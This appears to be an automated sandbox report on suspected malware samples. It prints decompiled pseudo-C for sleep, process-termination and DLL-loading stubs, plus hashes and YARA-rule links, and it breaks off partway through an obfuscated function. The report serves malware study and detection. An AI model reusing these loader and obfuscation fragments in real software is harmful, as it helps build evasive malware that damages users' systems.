Instruction Fuzzy Hash: 73F01271944701CBE621BB669406B9A72A0EF40718F11817FE5A0772D1DB7C5941CA9E

Uniqueness

Uniqueness Score: -1.00%

Function 004093E8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E004093E8(void* __ebx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
				intOrPtr _t17;
				intOrPtr* _t28;
				void* _t29;

				_t30 = __eflags;
				_t28 = __esi;
				_t27 = __edi;
				_t26 = __edx;
				_t19 = __ebx;
				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
				E00403789(__ebx, __edx, __edi, __eflags,  *((intOrPtr*)(_t29 - 0x28)));
				 *((intOrPtr*)(E00407DEA(__ebx, __edx, __edi, __eflags) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
				_t17 = E00407DEA(_t19, _t26, _t27, _t30);
				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
					_t17 =  *((intOrPtr*)(__esi + 0x14));
					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
						if( *((intOrPtr*)(_t29 - 0x34)) == 0) {
							_t37 =  *((intOrPtr*)(_t29 - 0x1c));
							if( *((intOrPtr*)(_t29 - 0x1c)) != 0) {
								_t17 = E00403762(_t37,  *((intOrPtr*)(_t28 + 0x18)));
								_t38 = _t17;
								if(_t17 != 0) {
									_push( *((intOrPtr*)(_t29 + 0x10)));
									_push(_t28);
									return E00409180(_t38);
								}
							}
						}
					}
				}
				return _t17;
			}

0x004093e8
0x004093e8
0x004093e8
0x004093e8
0x004093e8
0x004093eb
0x004093f1
0x004093ff
0x00409405
0x0040940d
0x00409419
0x00409421
0x00409429
0x0040943d
0x0040943f
0x00409443
0x00409448
0x0040944e
0x00409450
0x00409452
0x00409455
0x00000000
0x0040945c
0x00409450
0x00409443
0x0040943d
0x00409429
0x0040945d

APIs

Part of subcall function 00403789: __getptd.LIBCMT ref: 0040378F
Part of subcall function 00403789: __getptd.LIBCMT ref: 0040379F

__getptd.LIBCMT ref: 004093F7

Part of subcall function 00407DEA: __getptd_noexit.LIBCMT ref: 00407DED
Part of subcall function 00407DEA: __amsg_exit.LIBCMT ref: 00407DFA

__getptd.LIBCMT ref: 00409405

Strings

csm, xrefs: 00409413

Memory Dump Source

Source File: 00000000.00000002.659904832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.659901598.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.659915277.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.659920593.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.659924739.000000000041A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.659935449.0000000000433000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.659950094.000000000043B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.659954018.0000000000442000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_U3E7zMaux2.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: cb8721f006335f0d965b5e949dac83853dc37aeaf957dce9d60ee321be23e131
Instruction ID: 55d841a1f15d396c75fb59b589cc08f23a0a11b9f07be34aa0053eb1ab7cfaa9
Opcode Fuzzy Hash: cb8721f006335f0d965b5e949dac83853dc37aeaf957dce9d60ee321be23e131
Instruction Fuzzy Hash: 5C0128748052058ACF24AFA5E464AAEB7B5AF11311F54893FE440766D3CB389D86CA19

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: U3E7zMaux2.exe PID: 6728 Parent PID: 6688 U3E7zMaux2.exeCOMMON

Execution Graph

Execution Coverage:	4.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	24
Total number of Limit Nodes:	0

Executed Functions

Function 0040196D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 46%

			E0040196D(void* __eax, void* __ebx, void* __ecx, void* __edi, short __esi, void* __fp0) {
				intOrPtr _t14;
				void* _t17;
				intOrPtr* _t23;
				void* _t26;
				void* _t27;
				void* _t28;
				signed int _t33;
				intOrPtr* _t35;
				void* _t38;

				_t31 = __esi;
				_t29 = __edi;
				asm("in eax, 0xe5");
				 *((short*)(__eax + _t33 * 2)) = __esi;
				 *((intOrPtr*)(__eax + _t33 * 2)) = __esi;
				_push(0x1999);
				_t14 =  *_t35;
				__eflags = __al;
				_t26 = 0x5c;
				E004012AB(_t14, __ebx, _t26, _t28, __edi, __esi, _t38);
				_t23 =  *((intOrPtr*)(_t33 + 8));
				Sleep(0x1388);
				_t17 = E004014EA(_t28, _t38, __fp0, _t23,  *((intOrPtr*)(_t33 + 0xc)),  *((intOrPtr*)(_t33 + 0x10)), _t33 - 4); // executed
				_t39 = _t17;
				if(_t17 != 0) {
					_push( *((intOrPtr*)(_t33 + 0x14)));
					_push( *((intOrPtr*)(_t33 - 4)));
					_push(_t17);
					_push(_t23); // executed
					E004015BD(_t23, _t28, _t29, _t31, _t39); // executed
				}
				 *_t23(0xffffffff, 0); // executed
				_t27 = 0x5c;
				return E004012AB(0x1999, _t23, _t27, _t28, _t29, _t31, _t39);
			}

0x0040196d
0x0040196d
0x0040196d
0x00401970
0x00401971
0x00401973
0x00401978
0x00401986
0x0040198c
0x00401994
0x00401999
0x004019a1
0x004019af
0x004019b4
0x004019b6
0x004019b8
0x004019bb
0x004019be
0x004019bf
0x004019c0
0x004019c0
0x004019c9
0x004019e8
0x004019f9

APIs

Sleep.KERNELBASE(00001388), ref: 004019A1
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019C9

Strings

j\Y, xrefs: 00401989

Memory Dump Source

Source File: 00000001.00000002.713110427.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U3E7zMaux2.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID: j\Y
API String ID: 417527130-662177190
Opcode ID: 60e19d2a587da5622c2a6d9172a049e9a5b2b5b2e4593a54255e3bb5c4ee03a0
Instruction ID: 595b9c3ea7707adfb89ee20c44a57f79679102a22a402f6ef59d3c67027402ce
Opcode Fuzzy Hash: 60e19d2a587da5622c2a6d9172a049e9a5b2b5b2e4593a54255e3bb5c4ee03a0
Instruction Fuzzy Hash: B10184B2604245EBDB005FE5DC92DAA3B74AF01314F2401ABF512B91F2DA3C8513E71A

Uniqueness

Uniqueness Score: -1.00%

Function 00401962, Relevance: 3.1, APIs: 2, Instructions: 52
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 44%

			E00401962(void* __ecx, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t9;
				void* _t12;
				void* _t17;
				intOrPtr* _t18;
				void* _t20;
				void* _t21;
				void* _t22;
				void* _t23;
				void* _t24;
				intOrPtr* _t25;
				void* _t27;

				_push(0x1999);
				_t9 =  *_t25;
				__eflags = __al;
				_t20 = 0x5c;
				E004012AB(_t9, _t17, _t20, _t22, _t23, _t24, _t27);
				_t18 = _a4;
				Sleep(0x1388);
				_t12 = E004014EA(_t22, _t27, __fp0, _t18, _a8, _a12,  &_v8); // executed
				_t28 = _t12;
				if(_t12 != 0) {
					_push(_a16);
					_push(_v8);
					_push(_t12);
					_push(_t18); // executed
					E004015BD(_t18, _t22, _t23, _t24, _t28); // executed
				}
				 *_t18(0xffffffff, 0); // executed
				_t21 = 0x5c;
				return E004012AB(0x1999, _t18, _t21, _t22, _t23, _t24, _t28);
			}

0x00401973
0x00401978
0x00401986
0x0040198c
0x00401994
0x00401999
0x004019a1
0x004019af
0x004019b4
0x004019b6
0x004019b8
0x004019bb
0x004019be
0x004019bf
0x004019c0
0x004019c0
0x004019c9
0x004019e8
0x004019f9

APIs

Sleep.KERNELBASE(00001388), ref: 004019A1
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019C9

Memory Dump Source

Source File: 00000001.00000002.713110427.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U3E7zMaux2.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: e6583a46ba0c482cc9ee2622c86c4f26a038c05ef2be8949cbdfc3cdf2952675
Instruction ID: c7dbb5b86db80192b1cd6b67b95130a9e8bba6362884e51d04f8a5ef40e6dacf
Opcode Fuzzy Hash: e6583a46ba0c482cc9ee2622c86c4f26a038c05ef2be8949cbdfc3cdf2952675
Instruction Fuzzy Hash: A50144F1208205FBEB005AD59DA2E7B3668AB01715F20013BBA03790F1D57D9913E72B

Uniqueness

Uniqueness Score: -1.00%

Function 00401A0B, Relevance: 1.6, APIs: 1, Instructions: 96
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019C9

Memory Dump Source

Source File: 00000001.00000002.713110427.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U3E7zMaux2.jbxd

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 00d9af8ada967e92f08724f842517e3d5e3f1b979023ce9469ee702bd8b35524
Instruction ID: 6d9108f025a0daaf84588f91761baf46a4613dd7645499535b00fdf5ce75212c
Opcode Fuzzy Hash: 00d9af8ada967e92f08724f842517e3d5e3f1b979023ce9469ee702bd8b35524
Instruction Fuzzy Hash: 3E21D074609204EAC7156665C863FB637909B41329F60153FE9A3BE2F2C67C4487EB27

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: uufaeea PID: 6944 Parent PID: 2804 uufaeeaCOMMON

Execution Graph

Execution Coverage:	4.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	24
Total number of Limit Nodes:	0

Executed Functions

Function 0040196D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 46%

			E0040196D(void* __eax, void* __ebx, void* __ecx, void* __edi, short __esi, void* __fp0) {
				intOrPtr _t14;
				void* _t17;
				intOrPtr* _t23;
				void* _t26;
				void* _t27;
				void* _t28;
				signed int _t33;
				intOrPtr* _t35;
				void* _t38;

				_t31 = __esi;
				_t29 = __edi;
				asm("in eax, 0xe5");
				 *((short*)(__eax + _t33 * 2)) = __esi;
				 *((intOrPtr*)(__eax + _t33 * 2)) = __esi;
				_push(0x1999);
				_t14 =  *_t35;
				__eflags = __al;
				_t26 = 0x5c;
				E004012AB(_t14, __ebx, _t26, _t28, __edi, __esi, _t38);
				_t23 =  *((intOrPtr*)(_t33 + 8));
				Sleep(0x1388);
				_t17 = E004014EA(_t28, _t38, __fp0, _t23,  *((intOrPtr*)(_t33 + 0xc)),  *((intOrPtr*)(_t33 + 0x10)), _t33 - 4); // executed
				_t39 = _t17;
				if(_t17 != 0) {
					_push( *((intOrPtr*)(_t33 + 0x14)));
					_push( *((intOrPtr*)(_t33 - 4)));
					_push(_t17);
					_push(_t23); // executed
					E004015BD(_t23, _t28, _t29, _t31, _t39); // executed
				}
				 *_t23(0xffffffff, 0); // executed
				_t27 = 0x5c;
				return E004012AB(0x1999, _t23, _t27, _t28, _t29, _t31, _t39);
			}

APIs

Sleep.KERNELBASE(00001388), ref: 004019A1
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019C9

Strings

j\Y, xrefs: 00401989

Memory Dump Source

Source File: 0000000C.00000002.766808335.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_uufaeea.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID: j\Y
API String ID: 417527130-662177190
Opcode ID: 60e19d2a587da5622c2a6d9172a049e9a5b2b5b2e4593a54255e3bb5c4ee03a0
Instruction ID: 595b9c3ea7707adfb89ee20c44a57f79679102a22a402f6ef59d3c67027402ce
Opcode Fuzzy Hash: 60e19d2a587da5622c2a6d9172a049e9a5b2b5b2e4593a54255e3bb5c4ee03a0
Instruction Fuzzy Hash: B10184B2604245EBDB005FE5DC92DAA3B74AF01314F2401ABF512B91F2DA3C8513E71A

Uniqueness

Uniqueness Score: -1.00%

Function 00401962, Relevance: 3.1, APIs: 2, Instructions: 52
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 44%

			E00401962(void* __ecx, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t9;
				void* _t12;
				void* _t17;
				intOrPtr* _t18;
				void* _t20;
				void* _t21;
				void* _t22;
				void* _t23;
				void* _t24;
				intOrPtr* _t25;
				void* _t27;

				_push(0x1999);
				_t9 =  *_t25;
				__eflags = __al;
				_t20 = 0x5c;
				E004012AB(_t9, _t17, _t20, _t22, _t23, _t24, _t27);
				_t18 = _a4;
				Sleep(0x1388);
				_t12 = E004014EA(_t22, _t27, __fp0, _t18, _a8, _a12,  &_v8); // executed
				_t28 = _t12;
				if(_t12 != 0) {
					_push(_a16);
					_push(_v8);
					_push(_t12);
					_push(_t18); // executed
					E004015BD(_t18, _t22, _t23, _t24, _t28); // executed
				}
				 *_t18(0xffffffff, 0); // executed
				_t21 = 0x5c;
				return E004012AB(0x1999, _t18, _t21, _t22, _t23, _t24, _t28);
			}

APIs

Sleep.KERNELBASE(00001388), ref: 004019A1
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019C9

Memory Dump Source

Source File: 0000000C.00000002.766808335.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_uufaeea.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: e6583a46ba0c482cc9ee2622c86c4f26a038c05ef2be8949cbdfc3cdf2952675
Instruction ID: c7dbb5b86db80192b1cd6b67b95130a9e8bba6362884e51d04f8a5ef40e6dacf
Opcode Fuzzy Hash: e6583a46ba0c482cc9ee2622c86c4f26a038c05ef2be8949cbdfc3cdf2952675
Instruction Fuzzy Hash: A50144F1208205FBEB005AD59DA2E7B3668AB01715F20013BBA03790F1D57D9913E72B

Uniqueness

Uniqueness Score: -1.00%

Function 00401A0B, Relevance: 1.6, APIs: 1, Instructions: 96
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019C9

Memory Dump Source

Source File: 0000000C.00000002.766808335.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_uufaeea.jbxd

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 00d9af8ada967e92f08724f842517e3d5e3f1b979023ce9469ee702bd8b35524
Instruction ID: 6d9108f025a0daaf84588f91761baf46a4613dd7645499535b00fdf5ce75212c
Opcode Fuzzy Hash: 00d9af8ada967e92f08724f842517e3d5e3f1b979023ce9469ee702bd8b35524
Instruction Fuzzy Hash: 3E21D074609204EAC7156665C863FB637909B41329F60153FE9A3BE2F2C67C4487EB27

Uniqueness

Uniqueness Score: -1.00%

Function 004027ED, Relevance: 1.5, APIs: 1, Instructions: 49
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E004027ED(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				struct _OBJDIR_INFORMATION _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t9;
				long _t12;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t19;
				void* _t20;
				void* _t21;
				void* _t23;
				UNICODE_STRING* _t24;
				intOrPtr* _t25;
				intOrPtr* _t26;

				_t9 = 0x2824;
				_t18 =  *_t25;
				_t26 = _t25 + 4;
				E004012AB(_t9, _t16, _t18, _t20, _t21, _t23, __eflags);
				_t17 = _a4;
				_t24 =  &_v16;
				 *((intOrPtr*)(_a4 + 0xc))(_t24, _a8, 0x53);
				_t22 =  &_v8;
				_t12 = LdrLoadDll(0, 0, _t24,  &_v8);
				_t29 = _t12;
				if(_t12 != 0) {
					_v8 = 0;
				}
				_push(0x53);
				_t19 =  *_t26;
				E004012AB(0x2824, _t17, _t19, _t20, _t22, _t24, _t29);
				return _v8;
			}

0x00402800
0x00402812
0x00402815
0x0040281f
0x00402824
0x00402827
0x0040282e
0x00402831
0x0040283a
0x0040283d
0x0040283f
0x00402841
0x00402841
0x00402863
0x00402865
0x00402872
0x0040287e

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 0040283A

Memory Dump Source

Source File: 0000000C.00000001.753249311.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_1_400000_uufaeea.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 7b811dfe18a2fa04bac5265394d9a2456aa6afd5894524daffa0ad136d012fbe
Instruction ID: 86d1809ebd5855410281f38b9c9c6c09a144d2210cd9b7f1e60e22e0793f0f49
Opcode Fuzzy Hash: 7b811dfe18a2fa04bac5265394d9a2456aa6afd5894524daffa0ad136d012fbe
Instruction Fuzzy Hash: CD01D43BA08105E7D6007A818A4DF6A7724EB50744F20C137A6077A1C0C5FC9A07E7BB

Uniqueness

Uniqueness Score: -1.00%

Function 0040280A, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040280A(intOrPtr __ebx, HMODULE* __edi, UNICODE_STRING* __esi, void* __eflags) {
				void* __ebp;
				void* _t12;
				long _t15;
				intOrPtr _t18;
				intOrPtr _t19;
				void* _t20;
				UNICODE_STRING* _t23;
				void* _t25;
				intOrPtr* _t26;

				_t29 = __eflags;
				_t23 = __esi;
				_t21 = __edi;
				_t16 = __ebx;
				if(__eflags < 0) {
					if(__eflags >= 0) {
						__ecx = __ecx + 1;
						__eflags = __bl;
						_t12 = 0x2824;
					} else {
					}
					_t19 =  *_t26;
					_t26 = _t26 + 4;
					E004012AB(_t12, _t16, _t19, _t20, _t21, _t23, _t29);
					_t16 =  *((intOrPtr*)(_t25 + 8));
					_t23 = _t25 - 0xc;
					 *((intOrPtr*)( *((intOrPtr*)(_t25 + 8)) + 0xc))(_t23,  *((intOrPtr*)(_t25 + 0xc)), 0x53);
					_t21 = _t25 - 4;
					_t15 = LdrLoadDll(0, 0, _t23, _t25 - 4);
					_t30 = _t15;
					if(_t15 != 0) {
						 *(_t25 - 4) = 0;
					}
				}
				_push(0x53);
				_t18 =  *_t26;
				E004012AB(0x2824, _t16, _t18, _t20, _t21, _t23, _t30);
				return  *(_t25 - 4);
			}

0x0040280a
0x0040280a
0x0040280a
0x0040280a
0x0040280b
0x0040280d
0x00402803
0x00402804
0x00402800
0x0040280f
0x0040280f
0x00402812
0x00402815
0x0040281f
0x00402824
0x00402827
0x0040282e
0x00402831
0x0040283a
0x0040283d
0x0040283f
0x00402841
0x00402841
0x00402848
0x00402863
0x00402865
0x00402872
0x0040287e

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 0040283A

Memory Dump Source

Source File: 0000000C.00000001.753249311.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_1_400000_uufaeea.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 816e61236cf151029f9916b06356fa28e65bf4d83d8dd38ba6b14be9c999f240
Instruction ID: 9ca859c839910d9830ac79efeaa13c409ccf86f2f3a4ee59ee812277144ea7f3
Opcode Fuzzy Hash: 816e61236cf151029f9916b06356fa28e65bf4d83d8dd38ba6b14be9c999f240
Instruction Fuzzy Hash: B901843BA04105E7DA00BA819A4DBAE7764AB50704F10C57BE6077A1C5C6FC9607A76B

Uniqueness

Uniqueness Score: -1.00%

Function 0040281A, Relevance: 1.5, APIs: 1, Instructions: 38
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040281A(void* __eax, void* __ebx, void* __edi, void* __esi) {
				long _t12;
				intOrPtr _t19;
				intOrPtr _t20;
				void* _t21;
				UNICODE_STRING* _t26;
				void* _t28;
				intOrPtr* _t30;
				intOrPtr* _t31;
				void* _t34;

				_t34 = __eax - 0x90;
				_t19 =  *_t30;
				_t31 = _t30 + 4;
				E004012AB(__eax, __ebx, _t19, _t21, __edi, __esi, _t34);
				_t17 =  *((intOrPtr*)(_t28 + 8));
				_t26 = _t28 - 0xc;
				 *((intOrPtr*)( *((intOrPtr*)(_t28 + 8)) + 0xc))(_t26,  *((intOrPtr*)(_t28 + 0xc)), 0x53);
				_t23 = _t28 - 4;
				_t12 = LdrLoadDll(0, 0, _t26, _t28 - 4);
				_t35 = _t12;
				if(_t12 != 0) {
					 *(_t28 - 4) = 0;
				}
				_push(0x53);
				_t20 =  *_t31;
				E004012AB(0x2824, _t17, _t20, _t21, _t23, _t26, _t35);
				return  *(_t28 - 4);
			}

0x0040281a
0x00402812
0x00402815
0x0040281f
0x00402824
0x00402827
0x0040282e
0x00402831
0x0040283a
0x0040283d
0x0040283f
0x00402841
0x00402841
0x00402863
0x00402865
0x00402872
0x0040287e

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 0040283A

Memory Dump Source

Source File: 0000000C.00000001.753249311.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_1_400000_uufaeea.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: ef76625e9fce4a99ac1b5c6db449950ac3397aa5a53fee84dab980023b8c3a58
Instruction ID: 04be1964ae6a2c4a8d34668d02d656748d1177ed5934df91e255a91300bf99b4
Opcode Fuzzy Hash: ef76625e9fce4a99ac1b5c6db449950ac3397aa5a53fee84dab980023b8c3a58
Instruction Fuzzy Hash: 58F0A43AA04105D7DB00BA81CA49B9D7720AB51704F10C57BE6067A1C4C6B99707E76B

Uniqueness

Uniqueness Score: -1.00%

Function 0040281E, Relevance: 1.5, APIs: 1, Instructions: 33
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040281E(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
				void* __edi;
				void* _t9;
				long _t12;
				intOrPtr _t20;
				void* _t21;
				void* _t22;
				UNICODE_STRING* _t26;
				void* _t28;
				intOrPtr* _t30;

				E004012AB(_t9, __ebx, __ecx, _t21, _t22, __esi, __eflags);
				_t17 =  *((intOrPtr*)(_t28 + 8));
				_t26 = _t28 - 0xc;
				 *((intOrPtr*)( *((intOrPtr*)(_t28 + 8)) + 0xc))(_t26,  *((intOrPtr*)(_t28 + 0xc)), _t22);
				_t23 = _t28 - 4;
				_t12 = LdrLoadDll(0, 0, _t26, _t28 - 4);
				_t34 = _t12;
				if(_t12 != 0) {
					 *(_t28 - 4) = 0;
				}
				_push(0x53);
				_t20 =  *_t30;
				E004012AB(0x2824, _t17, _t20, _t21, _t23, _t26, _t34);
				return  *(_t28 - 4);
			}

0x0040281f
0x00402824
0x00402827
0x0040282e
0x00402831
0x0040283a
0x0040283d
0x0040283f
0x00402841
0x00402841
0x00402863
0x00402865
0x00402872
0x0040287e

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 0040283A

Memory Dump Source

Source File: 0000000C.00000001.753249311.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_1_400000_uufaeea.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 65736493afcaf5b803b8217f4f0e2bcb43a663e8f28fff33dac9f311f6d1fd4a
Instruction ID: 3fd11184bcf92e870777245e351188805b8424fcd9c3dcde69815370b47807fd
Opcode Fuzzy Hash: 65736493afcaf5b803b8217f4f0e2bcb43a663e8f28fff33dac9f311f6d1fd4a
Instruction Fuzzy Hash: 9DF0303AA04105E7DB00BA91CA89B9E7770EB51714F10C16BE6067A1C4C6B89707E76B

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: D984.exe PID: 5756 Parent PID: 3424 D984.exeCOMMON

Execution Graph

Execution Coverage:	0.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	326
Total number of Limit Nodes:	3

Executed Functions

Function 004027CA, Relevance: .4, Instructions: 439
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000E.00000002.807014174.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_D984.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59ac989ca3708892bfd26f4acbf633906e2528be2d17ed7f41992104238ec0bb
Instruction ID: 0338b83136466491310ec3fcb80edeb4c240d654d82b0732370eb0c756bdbeb0
Opcode Fuzzy Hash: 59ac989ca3708892bfd26f4acbf633906e2528be2d17ed7f41992104238ec0bb
Instruction Fuzzy Hash: D4C1B93210E141DFEB00AE24EEC98DAFB65FF1633477001ABD8426B1D2C67B5542DB66

Uniqueness

Uniqueness Score: -1.00%

Function 00402A07, Relevance: .3, Instructions: 254
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 29%

			E00402A07(void* __edi, signed int __esi, void* __fp0) {
				signed int _t51;
				void* _t53;
				signed int _t56;
				void* _t59;
				void* _t62;
				void* _t65;
				void* _t67;
				void* _t71;
				void* _t72;
				void* _t81;
				void* _t85;
				void* _t86;
				void* _t91;
				void* _t92;
				signed int _t109;
				signed int* _t132;
				void* _t137;
				void* _t140;
				void* _t143;
				intOrPtr _t145;
				signed int* _t146;
				signed int _t147;
				void* _t149;
				signed int _t150;
				void* _t152;
				signed int _t153;
				signed int _t154;
				void* _t159;
				signed int _t160;
				signed int _t161;
				signed int _t166;
				void* _t174;
				void* _t181;
				signed long long _t183;

				_t181 = __fp0;
				_t153 = __esi;
				_t149 = __edi;
				asm("out 0x59, eax");
				asm("rcr byte [esi], cl");
				asm("fsubr dword [esi-0x2da4a48c]");
				asm("cmpsd");
				asm("movsb");
				asm("cs cmpsd");
				asm("movsb");
				asm("movsb");
				asm("movsb");
				asm("movsb");
				asm("ficomp word [ebx+0x59c6df54]");
				_t145 = ds;
				 *(__esi - 0x2f) =  *(__esi - 0x2f) | __esi;
				_pop(_t81);
				_t51 = _t154;
				_t4 = _t51 + 0x4ab073ae;
				_t146 =  *_t4;
				 *_t4 = _t145;
				asm("enter 0x9e6f, 0x38");
				asm("cmc");
				 *__esi =  *__esi ^ __esi;
				asm("rcl byte [edi+0x7f], 1");
				asm("fcomp dword [edi+0x795eb05f]");
				asm("lds esi, [eax+0x45b3f1a9]");
				_t166 = _t51 & 0xb345b3f1;
				asm("movsb");
				asm("movsb");
				_t140 = 0x9d;
				_t53 = E00401277(0x2a84, _t81, __edi, __esi, 0x5e, _t166);
				_pop(_t85);
				 *(_t85 + 0x3e) =  *(_t85 + 0x3e) ^ 0x00000012;
				_pop(_t86);
				 *((intOrPtr*)(_t86 + 0x35)) =  *((intOrPtr*)(_t86 + 0x35)) - _t86;
				asm("aaa");
				_t91 = 0x5b5b695b;
				 *((intOrPtr*)(_t91 + 0x3e)) =  *((intOrPtr*)(_t91 + 0x3e)) - 0x12;
				_pop(_t92);
				 *((intOrPtr*)(_t92 + 0x68)) =  *((intOrPtr*)(_t92 + 0x68)) - _t92;
				asm("aaa");
				asm("aaa");
				_t109 = 0x5b5b695b;
				asm("das");
				_t160 = _t159 - 1;
				_t56 = _t53 - 0x2b5b3a5b + 0xdbb726d6 | 0xb3a72ea4;
				_t156 = 0xdea4a4a7;
				asm("wait");
				_push(_t160);
				asm("fild word [eax-0xfa4a4a6]");
				asm("fcomp dword [ebp-0x4f404fb7]");
				_push(_t153);
				_t150 = _t149 -  *0xFFFFFFFFDEA4A4EF;
				_t168 = _t109 ^ _t150;
				if((_t109 ^ _t150) < 0) {
					_pop(_t132);
					_t153 = _t153 +  *((intOrPtr*)(_t56 - 0x4fd534a2));
					asm("scasd");
					asm("salc");
					_t156 = 0xdea4a4a7 - _t150;
					asm("int3");
					 *_t132 =  *_t132 ^ 0xffffffc6;
					asm("rcl byte [edi+0x7f], 1");
					asm("fcomp dword [edi-0x33a14fa1]");
					_t137 = 0xffffffb0;
					asm("movsd");
					asm("clc");
					_t71 = 0xffffffffb19799b2 -  *((intOrPtr*)(0xffffffffb19799b2));
					 *((intOrPtr*)(_t71 - 0x15)) =  *((intOrPtr*)(_t71 - 0x15)) + _t137;
